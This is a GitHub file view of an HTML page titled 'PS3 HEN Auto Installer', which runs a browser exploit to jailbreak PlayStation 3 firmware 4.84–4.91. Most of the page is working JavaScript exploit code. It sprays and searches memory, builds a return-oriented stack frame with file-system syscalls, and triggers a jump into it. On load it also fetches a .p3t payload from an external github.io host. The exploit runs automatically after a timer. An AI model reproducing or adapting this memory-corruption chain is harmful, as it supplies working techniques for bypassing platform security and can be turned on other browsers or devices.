-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
149 lines (144 loc) · 6.81 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
<!DOCTYPE html>
<html>
<head>
<script src="ps3hen_v100.js"></script>
<meta charset="UTF-8">
<title>PS3 HEN Auto Installer</title>
<script>
function downloadhen()
{
window.location.href = 'https://nikolaevich23.github.io/alt/' + fwVersion + '/PS3HEN.p3t';
}
function initROP(init)
{
try
{
if(init===true){frame_fails=0;search_base_off=0;search_size_ext=0;}
if(t_out!==0){clearTimeout(t_out);t_out=0;}
offset_array=[];
disable_all();
clearLogEntry();
xtra_data_addr=0;
stack_frame_addr=0;
jump_2_addr=0;
jump_1_addr=0;
var usb_fp_addr=0, index_key_addr=0;
var search_max_threshold=70*0x100000; // 70Mb maximum memory search
var search_base=0x80100000;//0x80190000;//
var search_size=2*mbytes;
search_size_ext=0*mbytes;
search_base_off=0*mbytes;
total_loops++;
xtra_data=start_x.convert()+usb_sp.convert()
+index_key.convert(true)
+unescape("\uFD7E");
while(xtra_data_addr===0)
{
if(search_max_threshold<search_size){load_check();return;}
xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));
xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size);
search_max_threshold-=search_size;
}
usb_fp_addr=xtra_data_addr+start_x.convertedSize()-0x4;
index_key_addr=usb_fp_addr+usb_sp.convertedSize();
//############################ Building stack frame ###############################################################
stack_frame=stack_frame_hookup()
+store_word(0x8a000004,sp_exit)
+store_word(0x8a000014,gadget_mod8_addr)
+syscall(sc_fs_open,usb_fp_addr,fs_flag_readonly,0x8e000000,0,0,0,0,0)
+syscall_r3r5_p2p(sc_fs_read,0x8e000000,0x8a000000,0x110000,0x8e000008,0,0,0,0,0,0)
+syscall_r3_p2p(sc_fs_close,0x8e000000,0,0,0,0,0,0,0,0,0)
+stack_frame_swap(0x8a000000)
+stack_frame_exit();
//############################ End stack frame ###############################################################
while(stack_frame_addr===0)
{
if(search_max_threshold<search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_ext+=0;}load_check();return;}
stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));
stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext);
if(stack_frame_addr==-1)if(search_max_threshold<search_size+search_size_ext){frame_fails++;load_check();return;}
search_max_threshold-=search_size+search_size_ext;
}
jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,0x8282)+hexw2bin(stack_frame_addr)+unescape("\uFB7E");
while(jump_2_addr===0)
{
if(search_max_threshold<search_size){load_check();return;}
jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));
jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);
if(jump_2_addr==-1)if(search_max_threshold<search_size){load_check();return;}
search_max_threshold-=search_size;
}
jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");
while(jump_1_addr===0)
{
if(search_max_threshold<search_size){load_check();return;}
jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));
jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);
if(jump_1_addr==-1)if(search_max_threshold<search_size){load_check();return;}
search_max_threshold-=search_size;
}
var sf=checkMemory(stack_frame_addr-0x4,0x8000,stack_frame.length);
var x=checkMemory(xtra_data_addr-0x4,0x1000,xtra_data.length);
var j2=checkMemory(jump_2_addr-0x4,0x1000,jump_2.length);
var j1=checkMemory(jump_1_addr-0x4,0x1000,jump_1.length);
if((j2===jump_2)&&(j1===jump_1)&&(x===xtra_data)&&(sf===stack_frame))
{
if(t_out!==0){clearTimeout(t_out);}
showResult(hr+"<h1><b><font color=%22386E38%22>Auto HEN installer initialized successfully.</font></b></h1><h3><b><font color=%22000000%22><span style='color:#000000;'>The HEN installation payload will launch automatically!</span></b></h3>");
//enable_trigger();
setTimeout(function () {
triggerX();
}, 3000);
}
else
{
if(x!==xtra_data)logAdd("xtra_data mismatch in memory!");
if(sf!==stack_frame)logAdd("stack_frame mismatch in memory!");
if(j2!==jump_2)logAdd("jump_2 mismatch in memory!");
if(j1!==jump_1)logAdd("jump_1 mismatch in memory!");
//logAdd("String mismatch in memory!");
load_check();
}
}
catch(e)
{
debug=true;
logAdd(br+"HEN Enabler initialization failed because the following exception was thrown during execution:"+br+e+" at : "+e.lineNumber);
debug=false;
}
}
function triggerX()
{
clearLogEntry();
showResult(hr+"<h2><b><span style='color:#000000;'>Installing HEN...</span></b></h2>");
disable_all();
setTimeout(trigger,1000,jump_1_addr);
setTimeout(rop_exit_hen,5000,hr+"<h1><b><font color=%22386E38%22>HEN is successfully installed</font></b></h1>","<h1><b><font color='red'>HEN Failure! Restart PS3 and retry!</font></b></h1>");
cleanGUI();
}
</script>
</head>
<body id="bodyId" style="background-color:#FFD097" onload="javascript:downloadhen()">
<div id="headerId" style="color:#CC2010">
<h1>PS3 HEN Auto Installer</h1>
<span style="color:#000000">Many thanks to xerpi for porting the memory leak exploit to ps3, zecoxao & Joonie for their early & renewed support, mysis for documenting vsh/lv2, SSL for his regular & precious advice, kakaroto for the PS3 IDA tools, naherwert for scetool, Rebug Team for producing/updating the only CFW adequate to develop this work & Cobra team for sharing their CobraUSB source, the psdevwiki team of course, STLcardsWS for his long standing contribution & ever constant support.<br>We also wish to thank all the ps3 community hackers/devs, past & present, who directly or indirectly helped us put this project together, you know who you are...</span><hr>
<h3>Supports CEX 4.84 - 4.91 HFW Firmware</h3>
<span style="color:#0055AA"><h3>INFO: If HEN is already installed, this will act as an Enabler</font></h3>
<span style="color:#222222"><h3>Instructions: Click the "Auto Install HEN" button. Wait.</font></h3>
<span style="color:#FF1122"><h3>* If initialization fails, set Home Page to about:blank and bookmark this page or return from history. Start browser again, load this page directly, and try again *</font></h3>
</div><hr>
<p><button id="btnROP" type="button" onclick="initROP(true);" autofocus>Auto Install HEN</button> | Auto-Close Browser <input type="checkbox" id="auto_close" name="aclose" checked="checked" onclick="autoclose();"/><span id="dex_txt" style="visibility:hidden"> | DEX mode<input type="checkbox" id="dex" name="DEX" disabled="" onclick="dex();"/></span></p>
<p><button id="btnReset" type="button" onclick="disable_trigger();">Reset</button></span></p>
<div id="result" style="color:#CC2010"></div><br>
<div id="log"></div>
<div id="exploit" ></div>
<div id="trigger"></div>
<div id="footer"></div>
<script>
writeEnvInfo();
ps3chk();
setTimeout(initROP,4000,true);
autoclose();
</script>
</body>
</html>